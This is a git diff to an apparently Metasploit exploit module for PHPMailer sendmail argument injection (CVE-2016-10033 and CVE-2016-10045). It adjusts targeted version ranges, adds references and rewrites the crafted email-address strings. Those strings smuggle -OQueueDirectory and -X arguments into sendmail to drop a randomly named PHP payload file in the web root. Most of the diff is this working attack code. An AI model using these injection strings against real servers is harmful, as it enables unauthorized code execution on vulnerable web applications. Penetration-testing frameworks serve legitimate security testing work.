diff --git a/modules/exploits/multi/http/phpmailer_arg_injection.rb b/modules/exploits/multi/http/phpmailer_arg_injection.rb index 71ecc020e4..c46581147d 100644 --- a/modules/exploits/multi/http/phpmailer_arg_injection.rb +++ b/modules/exploits/multi/http/phpmailer_arg_injection.rb @@ -15,7 +15,7 @@ class MetasploitModule < Msf::Exploit::Remote super(update_info(info, 'Name' => 'PHPMailer Sendmail Argument Injection', 'Description' => %q{ - PHPMailer versions up to and including 5.2.20 are affected by a + PHPMailer versions up to and including 5.2.19 are affected by a vulnerability which can be leveraged by an attacker to write a file with partially controlled contents to an arbitrary location through injection of arguments that are passed to the sendmail binary. This module @@ -31,6 +31,8 @@ class MetasploitModule < Msf::Exploit::Remote 'License' => MSF_LICENSE, 'References' => [ ['CVE', '2016-10033'], + ['CVE', '2016-10045'], + ['EDB', '40968'], ['EDB', '40969'], ['URL', 'https://github.com/opsxcq/exploit-CVE-2016-10033'], ['URL', 'https://legalhackers.com/advisories/PHPMailer-Exploit-Remote-Code-Exec-CVE-2016-10033-Vuln.html'] @@ -40,8 +42,8 @@ class MetasploitModule < Msf::Exploit::Remote 'Arch' => ARCH_PHP, 'Payload' => {'DisableNops' => true}, 'Targets' => [ - ['PHPMailer <=5.2.18', {}], - ['PHPMailer 5.2.20', {}] + ['PHPMailer <5.2.18', {}], + ['PHPMailer 5.2.18 - 5.2.19', {}] ], 'DefaultTarget' => 0 )) @@ -95,10 +97,10 @@ class MetasploitModule < Msf::Exploit::Remote payload_file_name = "#{rand_text_alphanumeric(8)}.php" payload_file_path = "#{datastore['WEB_ROOT']}/#{payload_file_name}" - if target.name == 'PHPMailer <=5.2.18' + if target.name == 'PHPMailer <5.2.18' email = "\"#{rand_text_alphanumeric(4 + rand(8))}\\\" -OQueueDirectory=/tmp -X#{payload_file_path} #{rand_text_alphanumeric(4 + rand(8))}\"@#{rand_text_alphanumeric(4 + rand(8))}.com" - elsif target.name == 'PHPMailer 5.2.20' - email = "\\\"#{rand_text_alphanumeric(4 + rand(8))}\\' -OQueueDirectory=/tmp -X#{payload_file_path} #{rand_text_alphanumeric(4 + rand(8))}\\\"@#{rand_text_alphanumeric(4 + rand(8))}.com" + elsif target.name == 'PHPMailer 5.2.18 - 5.2.19' + email = "\"#{rand_text_alphanumeric(4 + rand(8))}\\' -OQueueDirectory=/tmp -X#{payload_file_path} #{rand_text_alphanumeric(4 + rand(8))}\"@#{rand_text_alphanumeric(4 + rand(8))}.com" else fail_with(Failure::NoTarget, 'The specified version is not supported') end